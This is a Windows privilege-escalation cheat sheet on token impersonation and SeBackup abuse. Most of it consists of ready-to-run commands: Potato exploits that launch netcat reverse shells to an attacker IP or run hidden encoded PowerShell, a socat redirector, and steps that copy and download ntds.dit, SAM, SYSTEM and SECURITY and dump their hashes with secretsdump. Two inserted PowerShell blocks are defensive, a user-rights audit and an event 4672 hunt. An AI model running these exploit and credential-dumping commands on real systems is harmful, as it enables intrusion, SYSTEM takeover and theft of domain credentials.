Impersonation Privileges

Token impersonation is a technique through which a Windows local administrator could steal another user’s security token in order to impersonate and effectively execute commands as that user.

Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin; the summary below only lists direct ways to exploit each privilege to obtain an admin session or read sensitive files.

| Privilege | Impact | Tool |
|---|---|---|
| SeAssignPrimaryToken | Admin | 3rd party tool |
| SeImpersonate | Admin | 3rd party tool |
| SeBackupPrivilege | Admin | 3rd party tool |
| SeBackup | Threat | Built-in commands |
| SeCreateToken | Admin | 3rd party tool |
| SeDebug | Admin | PowerShell |
| SeLoadDriver | Admin | 3rd party tool |
| SeRestore | Admin | PowerShell |
| SeTakeOwnership | Admin | Built-in commands |
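Added example (not from the original page or the Priv2Admin project): a defender-side audit of which principals are granted the privileges in the table through the local User Rights Assignment. It exports the policy with `secedit`, parses the `[Privilege Rights]` section and resolves the SIDs to account names. It assumes an elevated PowerShell session on the host being audited; the export path and the list of privileges to report on are choices made here.

```powershell
# Privileges from the table above (full internal names as they appear in secedit output)
$riskyPrivileges = @(
    'SeAssignPrimaryTokenPrivilege',
    'SeImpersonatePrivilege',
    'SeBackupPrivilege',
    'SeRestorePrivilege',
    'SeCreateTokenPrivilege',
    'SeDebugPrivilege',
    'SeLoadDriverPrivilege',
    'SeTakeOwnershipPrivilege'
)

# Assumption: an elevated session; the export path is arbitrary
$exportPath = Join-Path $env:TEMP 'user-rights-audit.inf'

# /areas USER_RIGHTS limits the export to the [Privilege Rights] section
secedit /export /cfg $exportPath /areas USER_RIGHTS | Out-Null
if (-not (Test-Path $exportPath)) {
    throw "secedit export failed; run this from an elevated PowerShell session"
}

function Resolve-PrincipalName {
    param([string]$Entry)
    # secedit writes SIDs with a leading '*' (e.g. *S-1-5-32-544); names are left as-is
    if ($Entry.StartsWith('*')) {
        try {
            $sid = New-Object System.Security.Principal.SecurityIdentifier ($Entry.Substring(1))
            return $sid.Translate([System.Security.Principal.NTAccount]).Value
        } catch {
            return $Entry   # orphaned or unresolvable SID: keep the raw value
        }
    }
    return $Entry
}

$report = foreach ($line in Get-Content $exportPath) {
    # Lines look like: SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
    if ($line -match '^\s*(Se\w+Privilege)\s*=\s*(.+)$') {
        $priv = $Matches[1]
        if ($riskyPrivileges -contains $priv) {
            $holders = $Matches[2].Split(',') | ForEach-Object { Resolve-PrincipalName $_.Trim() }
            [pscustomobject]@{
                Privilege = $priv
                Holders   = ($holders -join '; ')
            }
        }
    }
}

$report | Sort-Object Privilege | Format-Table -AutoSize
Remove-Item $exportPath -ErrorAction SilentlyContinue
```

The report shows which groups grant each right, not every effective holder: a service account (an IIS application pool identity, for example) usually gets SeImpersonatePrivilege because it is a member of NT AUTHORITY\SERVICE (S-1-5-6), which is why that group appears under the impersonation rows. Anything beyond the built-in defaults (Administrators, SERVICE, LOCAL SERVICE, NETWORK SERVICE for impersonation; Administrators and Backup Operators for backup/restore) is worth an explanation.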

1. SeImpersonate or SeAssignPrimaryToken

If the machine is older than Windows 10 1809 / Windows Server 2019, try Juicy Potato.

If the machine is Windows 10 1809 / Windows Server 2019 or newer, try Rogue Potato.

- SharpImpersonate

https://github.com/juliourena/SharpImpersonate/tree/master

- SweetPotato

SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc EncBase64"

- JuicyPotato

Binary available at : https://github.com/ohpe/juicy-potato/releases

  1. Check the privileges of the service account; look for SeImpersonate and/or SeAssignPrimaryToken ("Impersonate a client after authentication").

whoami /priv

  2. Select a CLSID based on your Windows version. A CLSID is a globally unique identifier that identifies a COM class object.

https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md

  3. Execute JuicyPotato to run a privileged command.

Examples:

JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c nc.exe <IP> <PORT> -e c:\windows\system32\cmd.exe" -t *

JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c nc.exe <IP> <PORT> -e c:\windows\system32\cmd.exe" -t * -c <CLSID>

JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7}

JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}

JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe"

Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337

......

[+] authresult 0

{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

- Automated Juicy Potato: Lovely Potato (https://github.com/TsukiCTF/Lovely-Potato). Works only up to Windows Server 2016 and Windows 10 1803.

- PrintSpoofer

Works only up to Windows Server 2016 and Windows 10 1803.

  1. Check SeImpersonatePrivilege

- Rogue Potato (Fake OXID Resolver)

Binary available at https://github.com/antonioCoco/RoguePotato

  1. Network redirector / port forwarder to run on your remote machine; it must use port 135 as the source port.

sudo socat tcp-listen:135,reuseaddr,fork tcp:{Victim IP}:9999

  2. RoguePotato all-in-one, with RogueOxidResolver running locally on port 9999.

RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999

RoguePotato.exe -r 10.10.10.10 -e "C:\PrivEsc\reverse.exe" -l 9999

  3. RoguePotato without running RogueOxidResolver locally. Run RogueOxidResolver.exe on your remote machine instead.

Use this if you have firewall restrictions.

RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe"

  4. RoguePotato all-in-one, with RogueOxidResolver running locally on port 9999, a specific CLSID and a custom pipe name.

RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode

- RogueWinRM

Binary available at https://github.com/antonioCoco/RogueWinRM

RogueWinRM is a local privilege escalation exploit that allows escalating from a service account (with SeImpersonatePrivilege) to the Local System account if the WinRM service is not running (the default on Windows 10, but NOT on Windows Server 2019).

RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe {Our IP} {PORT}"

2. SeBackup

If a user has this privilege, they can dump the SAM (see Windows PostExp > Credential Theft).

We can also use https://github.com/giuliano108/SeBackupPrivilege:

upload SeBackupPrivilegeUtils.dll

upload SeBackupPrivilegeCmdLets.dll

Next, import the .dll files and invoke the Copy-FileSeBackupPrivilege cmdlet on ntds.dit and SYSTEM.

import-module .\SeBackupPrivilegeCmdLets.dll

import-module .\SeBackupPrivilegeUtils.dll

Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\windows\temp\NTDS -Overwrite

Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM c:\windows\temp\SYSTEM -Overwrite

Then download the saved files (example with evil-winrm):

download system

download ntds

Then run secretsdump with the LOCAL parameter to extract the hashes from the NTDS.dit:

secretsdump.py -ntds ntds -system system LOCAL

If this isn't a domain controller, there is no NTDS.dit file to get passwords from, so we would need to download the SYSTEM, SAM and SECURITY files instead:

Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM c:\windows\temp\SYSTEM -Overwrite

Copy-FileSeBackupPrivilege h:\windows\system32\config\SECURITY c:\windows\temp\SECURITY -Overwrite

Copy-FileSeBackupPrivilege h:\windows\system32\config\SAM c:\windows\temp\SAM -Overwrite

From these files we can extract LSA secrets, the machine account and local user hashes using secretsdump:

secretsdump.py -security security -sam sam -system system LOCAL
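Added example (not from the original page or any of the tools it links): a detection-side hunt for the privileges used in both sections above. Windows logs Security event 4672 ("Special privileges assigned to new logon") whenever a new logon token carries sensitive privileges such as SeBackupPrivilege or SeImpersonatePrivilege, and the PrivilegeList field names them. The function below reads those events, extracts the named EventData fields from the event XML, and reports logons that received one of the watched privileges for an account outside an expected baseline. It assumes an account that can read the Security log (locally or on a collector); the look-back window, the baseline list and the exclusion of computer accounts are tuning choices made here.

```powershell
function Find-UnexpectedPrivilegedLogon {
    param(
        # Look-back window; 7 days is an illustrative default
        [int]$Days = 7,
        # Constructed baseline of accounts that normally receive these privileges; extend per host
        [string[]]$ExpectedAccounts = @('SYSTEM', 'LOCAL SERVICE', 'NETWORK SERVICE'),
        # Privileges from the table and sections above that merit review
        [string[]]$WatchedPrivileges = @(
            'SeBackupPrivilege', 'SeRestorePrivilege',
            'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege',
            'SeDebugPrivilege', 'SeTakeOwnershipPrivilege', 'SeLoadDriverPrivilege'
        )
    )

    $since  = (Get-Date).AddDays(-$Days)
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4672; StartTime = $since } `
                           -ErrorAction SilentlyContinue

    foreach ($evt in $events) {
        # Pull EventData by field name from the XML rather than relying on property order
        $xml  = [xml]$evt.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        $account = $data['SubjectUserName']
        if (-not $account) { continue }
        # Tuning choice: skip computer accounts (names ending in $), which log 4672 routinely
        if ($account -match '\$$') { continue }
        if ($ExpectedAccounts -contains $account) { continue }

        # PrivilegeList is whitespace/newline separated; drop empty tokens
        $granted = ($data['PrivilegeList'] -split '\s+') | Where-Object { $_ }
        $hits    = $granted | Where-Object { $WatchedPrivileges -contains $_ }

        if ($hits) {
            [pscustomobject]@{
                Time       = $evt.TimeCreated
                Account    = "$($data['SubjectDomainName'])\$account"
                LogonId    = $data['SubjectLogonId']
                Privileges = ($hits -join ', ')
            }
        }
    }
}

# Usage: list the most recent unexpected privileged logons on this host
Find-UnexpectedPrivilegedLogon -Days 7 | Sort-Object Time -Descending | Format-Table -AutoSize
```

4672 fires at logon, so a service account that already holds SeImpersonatePrivilege (an IIS application pool identity, for example) will appear every time it logs on; the value is in the baseline, not the raw event. Add the accounts that legitimately show up on a given host to `-ExpectedAccounts`, and treat a new account name, or a workstation user suddenly receiving SeBackupPrivilege, as the signal. If "Audit Sensitive Privilege Use" is enabled, the later use of the privilege is also recorded separately from the logon event.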
